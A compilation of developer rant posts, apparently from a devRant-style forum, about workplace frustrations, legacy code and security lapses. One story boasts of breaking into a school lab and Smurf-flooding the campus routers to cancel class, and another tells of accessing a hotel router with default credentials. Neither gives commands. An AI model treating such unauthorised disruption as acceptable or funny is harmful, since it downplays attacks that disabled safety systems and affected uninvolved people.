Manager: We need to setup the security in the Mexico server

Dev: You mean that 3rd party firewall add on?

Manager: Yes

Dev: And set up the billing on the Mexico account?

Manager: Yes

Dev: lol, sure thing I’ll create the ticket

Manager: What’s so funny?

Dev: Nothing

Ticket: Build wall and get Mexico to pay for it.

Oh well

Another story on the spirit of wk93. TL;DR I DOS'd the whole campus network for some beers.

In highschool teachers had this blackboard system (a sort of moodle) and we used to have really lazy teachers who only read the PowerPoint presentations and made us take notes. One day I was fed up with their bullshit and figured these lazy ass professors wouldn't "teach" crap as soon as there was no internet connection...so the race was on...

10 minutes before the bell rang a friend and I managed to break in into a computer lab, I booted up Kali and searched for the access points, 3 routers through the building all with CISCO OS.

I figured they had all the default configs, time was running out so I decided to Smurf the three access points with the lab's IP range, scheduled an automatic shutdown in 2 hours and blocked the PC. The bell rang and as predicted, no internet, no class, my friends and I used that free time to go to a bar (on a Monday afternoon).

Funny side note, since the 3 routers were down the whole network collapsed, no cameras, no access control, no faculty network or any network. We kept doing it and every time we did campus security would be desperately searching for someone with a black hoodie.

Storytime!

Manager: Hey fullstackchris, the maps widget on our app stopped working recently...

Dev: (Skeptical, little did he know) Sigh... probably didn't raise quota or something stupid... Logs on to google cloud console to check it out...

Google Dashboard: Your bill.... $5,197 (!!!!!!) Payment method declined (you think?!)

Dev: 😱 WTF!?!?!! (Calls managers) Uh, we have HUGE problem, charges for $5000+ in our google account, did you guys remove the quota limits or not see any limit reached warnings!?

Managers: Uh, we didn't even know that an API could cost money, besides, we never check that email account!

Dev: 🤦‍♂️ yeah obviously you get charged, especially when there have literally been millions of requests. Anyway, the bigger question is where or how our key got leaked. Somewhat started hammering one of the google APIs with one of our keys (Proceeds to hunt for usages of said API key in the codebase)

Dev: (sweating 😰) did I expose an API key somewhere? Man, I hope it's not my fault...

Terminal: grep results in, CMS codebase!

Dev: ah, what do we have here, app.config, seems fine.... wait, why did they expose it to a PUBLIC endpoint?!

Long story short:

The previous consulting goons put our Angular CMS JSON config on a publicly accessible endpoint.

WITH A GOOGLE MAPS API KEY.

JUST CHILLING IN PLAINTEXT.

Though I'm relieved it wasn't my fault, my faith in humanity is still somewhat diminished. 🤷‍♂️

Oh, and it's only Monday. 😎

Cheers!

Fuck the memes.

Fuck the framework battles.

Fuck the language battles.

Fuck the titles.

Anybody who has been in this field long enough knows that it doesn't matter if your linus fucking torvalds, there is no human who has lived or ever will live that simultaneously understands, knows, and remembers how to implement, in multiple languages, the following:

- jest mocks for complex React components (partial mocks, full mocks, no mocks at all!)
- token cancellation for asynchronous Tasks in C#
- fullstack CRUD, REST, and websocket communication (throw in gRPC for bonus points)
- database query optimization, seeding, and design
- nginx routing, https redirection
- build automation with full test coverage and environment consideration
- docker container versioning, restoration, and cleanup
- internationalization on both the front AND backends
- secret storage, security audits
- package management, maintenence, and deprecation reviews
- integrating with dozens of APIs
- fucking how to center a div

and that's a _comically_ incomplete list; barely scratches the surface of the full range of what a dev can encounter in a given day of writing software

have many of us probably done one or even all of these at different times? surely.

but does that mean we are supposed to draw that up at a moment's notice some cookie-cutter solution like a fucking robot and spit out an answer on a fax sheet?

recruiters, if you read this site (perhaps only the good ones do anyway so its wasted oxygen), just know that whoever you hire its literally the luck of the draw of how well they perform during the interview. sure, perhaps some perform better, but you can never know how good someone is until they literally start working at your org, so... have fun with that.

Oh and I almost forgot, again for you recruiters, on top of that list which you probably won't ever understand for the entirety of your lives, you can also add writing documentation, backup scripts, and orchestrating / administrating fucking JIRA or actually any somewhat technical dashboard like a CMS or website, because once again, the devs are the only truly competent ones - and i don't even mean in a technical sense, i mean in a HUMAN sense of GETTING SHIT DONE IN GENERAL.

There's literally 2 types of people in the world: those who sit around drawing flow charts and talking on the phone all day, and those WHO LITERALLY FUCKING BUILD THE WORLD

why don't i just run the whole fucking company at this point? you guys are "celebrating" that you made literally $5 dollars from a single customer and i'm just sitting here coding 12 hours a day like all is fine and well

i'm so ANGRY its always the same no matter where i go, non-technical people have just no clue, even when you implore them how long things take, they just nod and smile and say "we'll do it the MVP way". sure, fine, you can do that like 2 or 3 times, but not for 6 fucking months until you have a stack of "MVPs" that come toppling down like the garbage they are.

How do expect to keep the "momentum" of your customers and sales (I hope you can hear the hatred of each of these market words as I type them) if the entire system is glued together with ducktape because YOU wanted to expedite the feature by doing it the EASY way instead of the RIGHT way. god, just forget it, nobody is going to listen anyway, its like the 5th time a row in my life

we NEED tests!
we NEED to know our code coverage!
we NEED to design our system to handle large amounts of traffic!
we NEED detailed logging!
we NEED to start building an exception database!

BILBO BAGGINS! I'm not trying to hurt you! I'm trying to help you!

Don't really know what this rant was, I'm just raging and all over the place at the universe. I'm going to bed.

I have spent 20 minutes explaining to a contractor how to stage a file in git and what a filepath is.

It's moments like this where I stop worrying about my job security

Oh you're a frontend guy? Good, we need one of those.

Oh you're a backend guy too? Good, we need one of those.

Oh you're a security guy too? Good, we need one of those.

Oh you're a devops guy too? Good, we need one of those.

Oh you're a QA guy too? Good, we need one of those.

Oh you're an SEO guy too? Good, we need one of those.

"Well, sorry to say fullStackCraft, but we found your cloud architecture skills just a little too lacking for this position. We really need someone who can do frontend, backend, security audits, QA assessments, SEO, AND build scaling cloud architecture. Oh and while you're at it, can you turn fucking water into gold? We need that at our company too. You didn't get the position, but it'd be great if you could refer us to someone who is very advanced in fucking alchemy. Thanks!"

Absolutely toxic the way software people are treated I swear. The money may be the only good thing that is left.

Dude
The client has a giant database with all credit and debit cards

ALL INFOS IN FUCKING PLAINTEXT
THE CARD NUMBER
THE CVV
THE EXPIRY DATE

I'M SHAKING AF

micromanager: "Quick and easy win! Please have this done in 2-3 days to start repairing your reputation"

ticket: "Scrap this gem, and implement your own external service wrapper using the new and vastly different Slack API!"

slack: "New API? Give me bearer tokens! Don't use that legacy url crap, wth"

prev dev: "Yeah idk what a bearer token is. Have the same url instead, and try writing it down so you don't forget it?"

Slack admin: "I can't give you access to the slack integration test app, even though it's for exactly this and three others have access already, including your (micro)manager."

Slack: "You can also <a>create a new slack app</a>!" -- link logs me into slack chat instead. After searching and finding a link elsewhere: doesn't let me.

Slack admin: "You want a new test slack app instead? Sure, build it the same as before so it isn't abuseable. No? Okay, plan a presentation for it and bring security along for a meeting on Friday and I'll think about it. I'm in some planning meetings until then."

asdfjkagel.

This job is endless delays, plus getting yelled at over the endless delays.

At least I can start on the code while I wait. Can't test anything for at least a week, though. =/

Yesterday,
I was a bit drunk.
But I wanted to improve security of the company. So, I went in Azure and activated “Security defaults” which forces MFA for all users in the company. (Because RH always forget to enable MFA for new employees, and I actually care about security)
Then I went in office 365 management and instead of resetting MFA for all users (Forcing everyone to redo MFA setup), I (by mistake) clicked on reset all passwords.
I tested my own account it was fine and went to sleep.
Got a call from CEO at 7am, all 30 employees cannot login in, cannot work.
What a shit show I made…
I have a call with CEO in about 2 hours, I don’t even know how to justify myself…
So children: don’t activate company wide options while drunk. Ever.

ARGH. I wrote a long rant containing a bunch of gems from the codebase at @work, and lost it.

I'll summarize the few I remember.

First, the cliche:
if (x == true) { return true; } else { return false; };
Seriously written (more than once) by the "legendary" devs themselves.

Then, lots of typos in constants (and methods, and comments, and ...) like:
SMD_AGENT_SHCEDULE_XYZ = '5-year-old-typo'

and gems like:

def hot_garbage
magic = [nil, '']
magic = [0, nil] if something_something
success = other_method_that_returns_nothing(magic)
if success == true
return true # signal success
end
end

^ That one is from our glorious self-proclaimed leader / "engineering director" / the junior dev thundercunt on a power trip. Good stuff.

Next up are a few of my personal favorites:

Report.run_every 4.hours # Every 6 hours
Daemon.run_at_hour 6 # Daily at 8am

LANG_ENGLISH = :en
LANG_SPANISH = :sp # because fuck standards, right?

And for design decisions...

The code was supposed to support multiple currencies, but just disregards them and sets a hardcoded 'usd' instead -- and the system stores that string on literally hundreds of millions of records, often multiple times too (e.g. for payment, display fees, etc). and! AND! IT'S ALWAYS A FUCKING VARCHAR(255)! So a single payment record uses 768 bytes to store 'usd' 'usd' 'usd'

I'd mention the design decisions that led to the 35 second minimum pay API response time (often 55 sec), but i don't remember the details well enough.

Also:
The senior devs can get pretty much anything through code review. So can the dev accountants. and ... well, pretty much everyone else. Seriously, i have absolutely no idea how all of this shit managed to get published.

But speaking of code reviews: Some security holes are allowed through because (and i quote) "they already exist elsewhere in the codebase." You can't make this up.

Oh, and another!
In a feature that merges two user objects and all their data, there's a method to generate a unique ID. It concatenates 12 random numbers (one at a time, ofc) then checks the database to see if that id already exists. It tries this 20 times, and uses the first unique one... or falls through and uses its last attempt. This ofc leads to collisions, and those collisions are messy and require a db rollback to fix. gg. This was written by the "legendary" dev himself, replete with his signature single-letter variable names. I brought it up and he laughed it off, saying the collisions have been rare enough it doesn't really matter so he won't fix it.

Yep, it's garbage all the way down.

Some 'wk306' highlights from different people:

Walk around the office in his underwear, because he forgot he left his trousers in the bathroom

Run a red light outside the office due to not wearing his required glasses. When questioned by co-workers, replied "I don't follow those facist rules"

Asking if we work less will we get paid more, because the project will take longer to do (while in a startup with no funding trying to secure some)

Tell a senior dev to stop testing in his spare time, as we won't be able to release on time if he keeps finding critical security bugs

Telling me "your timezone is not my concern", when asking for help with new tooling so we don't have to be online at the same time

Blaming my team for requesting too much help, leading to his team missing deadlines, in a meeting with very senior managers. When the reason we were requesting help was the handover doc we were given was filled with lies about features being finished and "ready to ship" and lacking any unit tests

Being accused of bullying and harassment to the CEO, because someone asked "did you follow up with X about the partnership they emailed us about". The person who was responsible, forgot 4 times, and saw it as an "attack" to mention it in team meetings

Telling an entire office/building mid November they've secured funding for at least the next year, then announcing in January after the Christmas break that its cheaper to move to India, so they are closing the office in 30 days

Doing some Christmas shopping.

Creating some throwaway accounts in various e-shops

Some e-shops send me my password via email upon registration.

I've spent the better half of a day emailing those e-shops to revise their IT security policies.

Haven't bought a single gift yet.

Time well spent!

While writing up this quarter's performance review, I re-read last quarter's goals, and found one my boss edited and added a minimum to: "Release more features that customers want and enjoy using, prioritized by product; minimum 4 product feature/bug tickets this quarter."

... they then proceeded to give me, not four+ product tickets, but: three security tickets (two of which are big projects), a frontend ticket that should have been assigned to the designer, and a slow query performance ticket -- on top of my existing security tickets from Q3.

How the fuck was I supposed to meet this requirement if I wasn't given any product tickets? What, finish the monster tickets in a week instead of a month or more each and beg for new product tickets from the product manager who refuses to even talk to me?

Fuck these people, seriously.

The deeper I go down the infosec rabbit hole, the more I worry about my doctors still using Windows XP. Why would you save sensitive patient info in those....shoe boxes?

I just had to print out some bills for a colleague.
Nothing too bad you say?

Well.. She doesn't seem to care about security or privacy at all.
I opened the website of her email provider at my computer and moved away from the keyboard, so she could log in.
But instead she told me her email and password... In an office with some other colleagues... Multiple times and wrote it onto a piece of paper that the later left on my table.
After that I should look through her inbox to find the bills.
(Yup, I know a lot more about her now)
After finding and printing out her bills, she just thanked me and walked out of the office, because hey, why should I log out of her account?

It's nice that she trusts me... But that was a bit too much...

I watched the news recently and they talked about cyber security.

To demonstrate "how serious the topic is" they showed a screen with a terminal and literally pinged google.com.

I thought that was funny

My CTO prefers to hire very expensive consultants than to trust on staff. It's funny, because he also decided that all technical teams should run on the absolute minimal amount of resources.

You can't imagine how shitty it felt this morning when he sent an email talking about a security consultant that we should hire, just because he thinks the guy could "take our expertise to the next level".
They will charge us 450/hour to run assessments, to find the exact same things my team discovered a year ago.

Google cripples ad and tracking blockers: In January, Chromium will switch to Manifest V3 which removes an essential API in favour of an inferior one. As usually, Google is being deceitful and touts security concerns as pretext.

That hits all Chromium based browser, such as my beloved Vivaldi. The team argues with their own browser internal blocker, but that's far worse than uBlock Origin. One of Vivaldi's core promises was privacy, and that will go out of the window. The team simply doesn't react to people pointing that out. They're fucked, and they know it.

So what now? Well, going back to Firefox because that will include the crippled new API for extension compatibility, but also keep the powerful old one specifically so that ad and tracking blockers will keep working. Google has just handed Mozilla a major unique selling point, and miraculously, Mozilla didn't fuck it up.

Devs: Hey, what should we do?

A:
provide our SDKs for download as easily as possible so that any potential customer can try it out and see how much better we are compared to our competitors?

Or…
B:
Should we lock our SDKs behind a login where the customer needs to create an account and enter the most amount of private information possible, just in case, then also require to create some security access tokens that he needs to configure in his app to have access to our service via the sdk and also hide all of the documentation behind a login which requires some permission based roles to access and also make the sdks closed source so that it’s a pain in the ass to debug and understand?

Marketing people:
B! Definitely B! Make sure to piss off and annoy our customers as much as humanly possible!

IE is dead ?!

NOT SO FAST.

The whole singin in Visual 2022 uses... Internet explorer renderer and... doesn't work on a Windows Server 2022 because of... "Enchanced internet explorer security policy".

I'm dying inside.

Well, for starters there was a cron to restart the webserver every morning.

The product was 10+ years old and written in PHP 5.3 at the time.

Another cron was running every 15 minutes, to "correct" data in the DB. Just regular data, not from an import or something.
Gotta have one of those self-healing systems I guess.

Yet another cron (there where lots) did run everyday from 02:00 to 4ish to generate the newest xlsx report. Almost took out the entire thing every time. MySQL 100%. CPU? Yes. RAM? You bet.

Lucky I wasn't too much involved at the time. But man, that thing was the definition of legacy.

Fun fact: every request was performed twice! First request gave the already logged-in client an unique access-token. Second request then processed the request with the (just issued) access-token; which was then discarded. Security I guess.

I don't know why it was build this way. It just was. I didn't ask. I didn't wanted to know. Some things are better left undisturbed. Just don't anger the machine. I became superstitious for a while. I think, in the end, it help a bit: It feels like communicating with an alien monster but all you have is a trumpet and chewing gum. Gentle does it.

Oh and "Sencha Extjs 3" almost gave me PTSD lol (it's an ancient JS framework). Followed by SOAPs WSDL cache. And a million other things.

DEAR CTOs, PLEASE ASK THE DEVELOPER OF THE SOFTWARE WHICH YOU ARE PLANNING TO BUY IN WHAT LANGUAGE AND WHAT VERSION THEY ARE WRITTEN IN.

Background: I worked a LONG time for a software company which developed a BIG crm software suite for a very niche sector. The softwary company was quite successfull and got many customers, even big companies bought our software. The thing is: The software is written in Ruby 1.8.7 and Rails 2. Even some customer servers are running debian squeeze... Yes, this setup is still in production use in 2022. (Rails 7 is the current version). I really don't get it why no one asked for the specific setup, they just bought it. We always told our boss, that we need time to upgrade. But he told every time, no one pays for an tech upgrade... So there it is, many TBs of customer data are in systems which are totally old, not updated and with possibly security issues.

We had an obligatory training today about security of remote access to company resources.

We sat for an hour listening to some outdated advice regarding passwords and preparing a work environment at home. Finally the instructor said his goodbyes and left. The rest of us stayed in the call to pass some actual recommendations.

Then we received a join request from a waiting lobby. Everyone muted. I let the guy in. For the next 8 minutes we watched the unaware instructor eat his breakfast and sign some documents stamped with a logotype of our competition.

Then I cleared my throat very loudly. He will have to print some of those documents again.

Stop calling people by their old occupation titles. .
Please address them by using their new titles accordingly
and they will like it their job more.

OLD: *Garden Boy*
NEW: *Landscape Executive and Animal Nutritionist*

OLD: *Petrol attendant*
NEW: *Fuel transmission engineer*

OLD: *Receptionist*
NEW: *Front Desk Controller*

OLD: *Typist*
NEW: *Printed Document Handler*

OLD: *Messenger*
NEW: *Business Communication Conveyer*

OLD: *Window Cleaner*
NEW: *Transparent Wall Technician*

OLD: *Temporary Teacher*
NEW: *Associate Teacher*

OLD: *Tea Boy*
NEW: *Refreshment Director*

OLD: *Garbage Collector*
NEW: *Environmental Sanitation Technician*

OLD: *Guard*
NEW: *Security Enforcement Director*

OLD: *Prostitute*
NEW: *Practical Sexual Relations Officer*

OLD: *Thief*
NEW: *Wealth Relocation Officer*

OLD: *Driver*
NEW: *Automobile Propulsion Specialist*

OLD: *Maid*
NEW: *Domestics Managing Director*

OLD: *Cook*
NEW: *Food Chemist*

OLD: *Gossip*
NEW: *Oral Research and Evaluation Director*

Which one got you more?

Cyber security. Deep knowledge of cyber security and networks is what I wish I had. The math stuff that no one bothers with, specifically.

Me: API support, please check why I'm getting ECONNTIMEDOUT for 3% of requests

supp: before we look into this, please answer these questions: a), b), c), d), e)

Me and coleague: *spend 20 minutes gathering all the details into a nice answer. Post the answers*

Slack bot: *removes the answer [allegedly for compliance/security]*

api supp: any update?

..... I really want to smash smth. Hulk SMASH!!!

Electric cars are not better for the environment. All petrol cars combined are only responsible for 7.9% of CO2 emissions. If your electric car is charged from a grid that is powered by a coal-burning power station, it contributes nothing to dealing with climate change. It only provides you with the false sense of security, and you can look cool telling your friends that “you know, I drive a Tesla, I’m environmentally conscious, your gas car is bad”.

Electric cars are lame. When I’m out of fuel, I can refuel fully in minutes. With electric car, I’ll have to wait at least five hours. Let’s be realistic, superchargers aren’t common, and will never be.

Gasoline is 46.4 MJ/kg, or 34.2 MJ/l. Li-Ion is 0.36–0.875. Let’s be generous and say it’s 0.9. To match 1 kg of petrol, I would need 51 kilos of batteries.

Average gas tank is 18 gallons, or 68 litres. To match that, my battery must have a weight of 2.5 metric tonnes. Bear in mind, empty battery and full battery has the same weight. Also, bear in mind, batteries perform worse in the winter.

As per energy density and practicality, things don’t get much better than petrol. Liquid hydrogen has higher energy density, but to store it, gas tank has to have very, very thick walls, to withstand the pressure. And, hydrogen is a bitch. It’s extremely dangerous. You can’t smell it until it’s too late. Hydrogen-air mixture will explode if you look at it the wrong way.

All that “electric cars good for climate” hype is merely Elon maintaining his stock bubble.

Years ago I used to work a guvmant site. They had really strict security rules for internet and how you spent your time. Makes sense considering what that site did. I was a support engineer for some of their process control equipment.

I was approached by an operator supervisor to install dvd player software on a business machine (non process related). Basically just a general purpose PC with no function other than time cards and general office use. I was fine with the request, but the reason was for watching movies during a holiday period by the operators. Not for anything official. So I made some noise about my dislike of this request feigning moral superiority. But the supervisor swore up and down it was for "training" dvds.

So I wrote a simple windows script. The script basically popped up a window that said:
"Security has detected unauthorized media inserted into this machine. Please state the reason for this infraction." It provided a dialog to enter a justification. After you entered the justification it said: "Security has been contacted and your user logged. You will be contacted shortly."

This script was then attached to the supervisors Start folder so it ran when he, and only he logged in. We made sure the "training" video (some movie) was already inserted at this point.

He logged in. He just about shit his pants when reading this. He promptly logged and left the building to walk somewhere else in the site. We called him and let him know it was a gag. His response: That son of a bitch Demolishun!

Wrote some code that solved a program in a semi unique way for the codebase. As in not oft used functionality of language.

Some time later... This might be hard to understand. Maybe I should do a different way.

Some time later... No, I will leave a comment to describe what is going on.

Some time later... That comment is kind of cryptic. Maybe should rethink.

Some time later... No, if the next dev doesn't know how this works then they should learn how it works. (reasoning here is that the functionality requires a knowledge of internals of language)

Some time later... Also, if nobody else gets this then they have to ask me how it works. Job security?

Some time later... STOP THINKING ABOUT THIS CODE AND MOVE ON!

When I need cash, sometimes I go to my clients and sell them "security updates"...

I am a one (wo)man Mafia!

That log4j RCE is some fucking nasty business!!! Its exploits have already been observed multiple times in our company scope.

Time for some unplanned Saturday evening hot-patches :/

P.S. Why the fuck leave such a feature enabled as default??? I mean really, whose brilliant idea was "let's leave the message parser enabled as well as the LDAP query hooks... BY FUCKING DEFAULT!!!"

I mean really, is anyone using that? ANYONE?

And then they laugh at me when I say "stay away from frameworks", "use as little libraries as possible", "avoid foreign code in your codebase",...

you know what.... JOKE'S ON YOU!

Why I love Salesforce 👀

- Run a test method
- failure: no field found

- checks test, queries field
- checks field security (access permissions) visible to user

- runs test again
- failure: no field found
- adds debug log of queried field

- runs test again
- succes

Thanks, thanks for fucking with me today 🥲

I should just quit. I am not paid enough to deal with this pissing contest.
Reviewer:
Need to add instructions (on readme) for installing pnmp, or if possible, have the top-level npm i install it (lol).
Also, it looks like we are no longer using lerna? If that's right, let's remove the dependency; its dependencies give some security audit messages at install.
Me:
it's good enough for now. Added a new ticket to resolve package manager confusions. (Migrate to pnpm workspaces)
Reviewer:
I will probably be responsible for automating deployment of this (I deployed the webapp on cloudflare pages and there is no work that needs to be done. "automating deployment" literally means replacing npm with pnpm). I disagree that it's good enough for now.

Imagine all readmes on github document how to install yarn/pnpm.

Lesson learned:
If you think an OOP static site developer can't handle modern JS framework, you are probably right.

105 pages of information security policy to read through before getting through onboarding that could have been summarized as: "This is 2022. Don't be an idiot."

Also 40 pages of code of conduct that could have been summarized thusly: "This is 2022. Everyone is offended by everything. Shut your cakehole, put your head down, don't make eye contact, and just do your job."

Working in security for many years only granted me world-class paranoia about taking pictures of myself and my family. It even made it hard to keep in touch with my friends as we don’t live in the same country anymore.

The good side is that it pays well enough to grant me a platinum foil hat.

I think what would help is to teach them these things:
- awareness for security in code
- how to use a fucking VCS like Git and how it works

I found this old printout of my username and password for my school account from ca 2008. I really like how the password are the same as the username except for some capitalization 😂😅

“sECurItY”

CR: "Add x here (to y) so it fits our code standards"
> No other Y has an X. None.

CR: "Don't ever use .html_safe"
> ... Can't render html without it. Also, it's already been sanitized, literally by sanitize(), written by the security team.

CR: "Haven't seen the code yet; does X change when resetting the password?"
> The feature doesn't have or reference passwords. It doesn't touch anything even tangentially related to passwords.
> Also: GO READ THE CODE! THAT'S YOUR BLOODY JOB!

CR: "Add an 'expired?' method that returns '!active'?"
> Inactive doesn't mean expired. Yellow doesn't mean sour. There's already an 'is_expired?' method.

CR: "For logging, always use json so we can parse it. Doesn't matter if we can't read it; tools can."
CR: "For logging, never link log entries to user-readable code references; it's a security concern."
CR: "Make sure logging is human-readable and text-searchable and points back to the code."
> Confused asian guy, his hands raised.

CR: "Move this data formatting from the view into the model."
> No. Views are for formatting.

CR: "Use .html() here since you're working with html"
> .html() does not support html. It converts arrays into html.

NONE OF THIS IS USEFUL! WHY ARE YOU WASTING MY TIME IF YOU HAVEN'T EVEN READ MY CODE!?

dfjasklfagjklewrjakfljasdf

Excerpts from "Bastard devops from hell" checklist:

- Insistently pronounce git with a soft "G" and refuse to understand people not using that pronunciation, the same goes for jithub, jitlab, jit lfs, jitkraken etc.

- Reject all pull requests not in haiku format, suggest the author needs to be more culturally open minded when offending.

- increment version numbers ONLY based on percentage code changed: Less than 1% patch increment, less than 5% minor increment, more than that major version increment.

- Cycle ALL access keys, personal tokens, connection strings etc. every month "for security reasons"

- invent and only allow usage of your own CI/CD language, for maximum reuse of course. Resist any changes to it after first draft release

The more I look into Windows 11 the more I hate it. There's just 1 (one) more thing that's wrong with it every time I look.

It's a security and ethical nightmare. I almost wish I didn't specialize in computer recovery & cybersecurity.

So thankful that my high-end gaming-built PC is apparently "not compatible" with Windows 11. Oh, you don't want to break my computer and ruin my entire life? That's actually a complement, man.

!rant Security training at work comes in the form of a serialized TV show where each episode concerns some security topic kind of tangentially and ends with a “REMEMBER… “ followed by the lesson you were supposed to get from the episode.

I kind of love it. A lot. I actually look forward to security training, and I’m not the only one. They stagger the release so you can’t binge watch all the seasons at once and you get three episodes at a time. 😂

I know folks do their best, but come on Apple, this can't be that hard. Bought an IPhone at an estate sale (elderly individual died suddenly, so no one had knowledge of the apple id, passwords, etc) and I've been trying to convince apple to clear the activation lock. (AS = Apple Support)

<after explaining the situation>
AS: "Have you tried putting the phone in recovery mode? That should clear the lock"
Me: "I've already done that. It prompts for the apple id and password, which I don't have"
AS: "You need to talk to the owner and get the information"
Me: "As I explained, I purchased the phone at an estate sale of someone who died. I have the bill of sale, serial number, the box, obituary. What else do you need?"
AS: "Have you tried contacting a family member? They might have have that information."
Me: "The family members at the sale told us this is all they had. This kind of thing has to happen. I can't believe Apple can't clear the activation lock."
AS: "Yes, we can, but I'm very sorry we take security seriously."
Me: "I understand, what do I do now?"
AS: "Did you log out of the phone? Go to settings ..."
Me: "Yes, I tried all those steps before calling. It prompts for the AppleID and password."
AS: "Did you try entering the password?"
Me: "No, I don't have it. I already explained there is no way to know"
AS: "Yes..yes...sorry...I'm just reading the information in front of me. I found something, have you tried submitting a activation lock removal request?"
Me: "Yes, it was denied, didn't tell me why, which is why I'm calling. What about taking this phone to an Apple store? I have all the paperwork."
AS: "Sure, you can try. You might need the death certificate. The family or the coroner will have a copy."
Me: "What!? Apple requires a death certificate to unlock a phone!? I'm pretty sure not even the family is going to give a total stranger a death certificate"
AS: "Sorry sir, I'm just reading what is in front of me. Without that certificate, there is no way to prove the person died. You can try the Apple store, but they will likely require it."
Me: "That's a lot of drama for unlocking a phone. A *phone*"
AS: "Yes sir, I understand. If there anything else we can do let us know and thank you for being an a apple customer."

Next stop, the Apple Store.

May be just me, but I am quite frustrated with complexity of systems nowadays, even more how it’s became a norm for developers to import a library for every little sh*t…

Like, do you even need to import that OSS library, can’t you make it without it? Is it really worth it to import that monstrous library of 10k loc, just so you can save writing those 50loc for just once?

It almost feels like it’s driven by logic “if you don’t own the code, then you don’t need to maintain it”. But ironically you still need to mantain it, only now not the code (best case), but the library itself. You have to upgrade it (for security, bug fixes) and you better pray there’re no breaking changes. And if you encounter an edge case/bug that no one addressed yet, then well, I bet you wished you didn’t use that library in the first place.

It’s so much easier to support small piece of code within your codebase, than fix a bug in a library, that possibly has thousands of unnecessary dependencies, enormous abstraction trees, and infinity loc to support all possible use cases, which your project doesn’t even care about.

Just to make it clear, I am not talking, about cases where some library would really do some heavy lifting for you, it would be non-sensical not to use it in that case.

And talking about complexity, let’s not even mention microservices, kubernetes, and other hyped stuff…

Does anyone else shares the sentiment?

I don't know if I'm being pranked or not, but I work with my boss and he has the strangest way of doing things.
- Only use PHP
- Keep error_reporting off (for development), Site cannot function if they are on.
- 20,000 lines of functions in a single file, 50% of which was unused, mostly repeated code that could have been reduced massively.
- Zero Code Comments
- Inconsistent variable names, function names, file names -- I was literally project searching for months to find things.
- There is nothing close to a normalized SQL Database, column ID names can't even stay consistent.
- Every query is done with a mysqli wrapper to use legacy mysql functions.
- Most used function is to escape stirngs
- Type-hinting is too strict for the code.
- Most files packed with Inline CSS, JavaScript and PHP - we don't want to use an external file otherwise we'd have to open two of them.
- Do not use a package manger composer because he doesn't have it installed.. Though I told him it's easy on any platform and I'll explain it.
- He downloads a few composer packages he likes and drag/drop them into random folder.
- Uses $_GET to set values and pass them around like a message contianer.
- One file is 6000 lines which is a giant if statement with somewhere close to 7 levels deep of recursion.
- Never removes his old code that bloats things.
- Has functions from a decade ago he would like to save to use some day. Just regular, plain old, PHP functions.
- Always wants to build things from scratch, and re-using a lot of his code that is honestly a weird way of doing almost everything.
- Using CodeIntel, Mess Detectors, Error Detectors is not good or useful.
- Would not deploy to production through any tool I setup, though I was told to. Instead he wrote bash scripts that still make me nervous.
- Often tells me to make something modern/great (reinventing a wheel) and then ends up saying, "I think I'd do it this way... Referes to his code 5 years ago".
- Using isset() breaks things.
- Tens of thousands of undefined variables exist because arrays are creates like $this[][][] = 5;
- Understanding the naming of functions required me to write several documents.
- I had to use #region tags to find places in the code quicker since a router was about 2000 lines of if else statements.
- I used Todo Bookmark extensions in VSCode to mark and flag everything that's a bug.
- Gets upset if I add anything to .gitignore; I tried to tell him it ignores files we don't want, he is though it deleted them for a while.
- He would rather explain every line of code in a mammoth project that follows no human known patterns, includes files that overwrite global scope variables and wants has me do the documentation.
- Open to ideas but when I bring them up such as - This is what most standards suggest, here's a literal example of exactly what you want but easier - He will passively decide against it and end up working on tedious things not very necessary for project release dates.
- On another project I try to write code but he wants to go over every single nook and cranny and stay on the phone the entire day as I watch his screen and Im trying to code.

I would like us all to do well but I do not consider him a programmer but a script-whippersnapper. I find myself trying to to debate the most basic of things (you shouldnt 777 every file), and I need all kinds of evidence before he will do something about it. We need "security" and all kinds of buzz words but I'm scared to death of this code. After several months its a nice place to work but I am convinced I'm being pranked or my boss has very little idea what he's doing. I've worked in a lot of disasters but nothing like this.

We are building an API, I could use something open source to help with anything from validations, routing, ACL but he ends up reinventing the wheel. I have never worked so slow, hindered and baffled at how I am supposed to build anything - nothing is stable, tested, and rarely logical. I suggested many things but he would rather have small talk and reason his way into using things he made.

I could fhave this project 50% done i a Node API i two weeks, pretty fast in a PHP or Python one, but we for reasons I have no idea would rather go slow and literally "build a framework". Two knuckleheads are going to build a PHP REST framework and compete with tested, tried and true open source tools by tens of millions?

I just wanted to rant because this drives me crazy. I have so much stress my neck and shoulder seems like a nerve is pinched. I don't understand what any of this means. I've never met someone who was wrong about so many things but believed they were right. I just don't know what to say so often on call I just say, 'uhh..'. It's like nothing anyone or any authority says matters, I don't know why he asks anything he's going to do things one way, a hard way, only that he can decipher. He's an owner, he's not worried about job security.

If there are bugs in your code, the problem 100% of the time is that you’re not using Rust. Just rewrite it in Rust, and all bugs, security, and performance issues will disappear. Any software not currently written in Rust should be rewritten in Rust. Rust is all you need to know as a Software Engineer. This future is Rust. Welcome to Software3.

There you are, fiddling with next.js webpack settings, because your isomorphic JS-in-CSS-in-JS SSR fallback from react-native-web to react-dom throws a runtime error on your SSR prerendering server during isomorphic asynchronous data prefetching from Kubernetes backend-for-frontend edge-server with GraphQL.

You have all that tech to display a landing page with an email form, just to send spam emails with ten tracking links and five tracking beacons per email.

Your product can be replaced by an Excel document made in two days.

It was developed in two years by a team of ten developers crunching every day under twelve project managers that can be replaced with a parrot trained to say “Any updates?”

Your evaluation is $5M+. You have 10,000 dependency security warnings, 1000 likes on Product Hunt, 500 comments on Hacker News, and a popular Twitter account.

Your future looks bright. You finish your coffee, crack your knuckles and carry on writing unit tests.

just saw a tweet praising a company because of their choice to use swiss servers and they had a pompous sentance in parenthesis like (upside to banking secret culture)

like, dude, at the end of the day, guaranteed their 'server' is just a linux box somewhere, just like anywhere else in the world just STFU

god i HATE ignorance, hype, and stupid tropes that managers just automatically subscribe to with their 2 brain cell NPC brain

Why the fuck do people not change their router admin password!? I was at a hotel today and could access their router admin interface with the default credentials. I guess this isn't purely the fault of the hotel because not all people know a damn thing about security and only use the interface to change the SSID and password of the AP. But why allow them to leave the default password? Why isn't this a standard feature to be forced to change the password :|

Leaking an API access token to the web client... oh no no noooo...

Apple: this AppleID has been locked for security reasons.
User: Sign Out
Apple: Enter the Apple ID password to turn off Find My iPhone.
User: Turn Off
Apple: You must enter both your Apple ID and password.
User: OK

Apple, please stop bugging me, all I need is to test my websites on Safari occasionally because some customers prefer to use iPhone. Just don't bother me with your Apple ID crap

Security!

Offensive and defensive at both code and infrastructure levels.

